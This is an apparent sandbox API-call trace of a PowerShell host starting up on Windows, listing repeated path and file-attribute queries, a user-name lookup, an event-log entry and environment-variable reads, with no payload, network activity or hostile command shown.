	[0355.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.117] SetErrorMode (uMode=0x1) returned 0x1
	[0355.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd590 | out: lpFileInformation=0x1cd590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.118] SetErrorMode (uMode=0x1) returned 0x1
	[0355.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.118] SetErrorMode (uMode=0x1) returned 0x1
	[0355.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd590 | out: lpFileInformation=0x1cd590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.118] SetErrorMode (uMode=0x1) returned 0x1
	[0355.118] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.118] CoTaskMemFree (pv=0x436a00) 
	[0355.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.124] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.124] SetErrorMode (uMode=0x1) returned 0x1
	[0355.124] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.124] SetErrorMode (uMode=0x1) returned 0x1
	[0355.124] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.124] SetErrorMode (uMode=0x1) returned 0x1
	[0355.124] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0355.124] SetErrorMode (uMode=0x1) returned 0x1
	[0355.125] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.125] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0355.125] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.125] SetErrorMode (uMode=0x1) returned 0x1
	[0355.125] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0355.125] SetErrorMode (uMode=0x1) returned 0x1
	[0355.125] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.125] SetErrorMode (uMode=0x1) returned 0x1
	[0355.125] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0355.125] SetErrorMode (uMode=0x1) returned 0x1
	[0355.126] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.126] SetErrorMode (uMode=0x1) returned 0x1
	[0355.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.126] SetErrorMode (uMode=0x1) returned 0x1
	[0355.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.126] SetErrorMode (uMode=0x1) returned 0x1
	[0355.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd550 | out: lpFileInformation=0x1cd550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.126] SetErrorMode (uMode=0x1) returned 0x1
	[0355.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.127] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.127] SetErrorMode (uMode=0x1) returned 0x1
	[0355.127] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd590 | out: lpFileInformation=0x1cd590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0355.127] SetErrorMode (uMode=0x1) returned 0x1
	[0355.127] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.127] SetErrorMode (uMode=0x1) returned 0x1
	[0355.127] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd590 | out: lpFileInformation=0x1cd590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0355.128] SetErrorMode (uMode=0x1) returned 0x1
	[0355.128] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0355.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.128] SetErrorMode (uMode=0x1) returned 0x1
	[0355.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd590 | out: lpFileInformation=0x1cd590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.128] SetErrorMode (uMode=0x1) returned 0x1
	[0355.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.128] SetErrorMode (uMode=0x1) returned 0x1
	[0355.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd590 | out: lpFileInformation=0x1cd590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.129] SetErrorMode (uMode=0x1) returned 0x1
	[0355.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0355.132] SetErrorMode (uMode=0x1) returned 0x1
	[0355.132] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd850 | out: lpFileInformation=0x1cd850*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0355.132] SetErrorMode (uMode=0x1) returned 0x1
	[0355.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.273] CoTaskMemAlloc (cb=0x804) returned 0x1b750480
	[0355.273] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b750480, nSize=0x1cdbb8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cdbb8) returned 0x1
	[0355.403] CoTaskMemFree (pv=0x1b750480) 
	[0355.403] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0355.403] GetUserNameW (in: lpBuffer=0x40c280, pcbBuffer=0x1cdbf8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cdbf8) returned 1
	[0355.403] CoTaskMemFree (pv=0x40c280) 
	[0355.404] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edb7f8*="Available", lpRawData=0x2edb588) returned 1
	[0355.528] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.528] CoTaskMemFree (pv=0x436a00) 
	[0355.528] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.529] CoTaskMemFree (pv=0x436a00) 
	[0355.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.531] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.531] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0355.531] CoTaskMemFree (pv=0x436a00) 
	[0355.531] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.531] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0355.531] CoTaskMemFree (pv=0x436a00) 
	[0355.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.533] GetCurrentProcessId () returned 0x4fc
	[0355.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
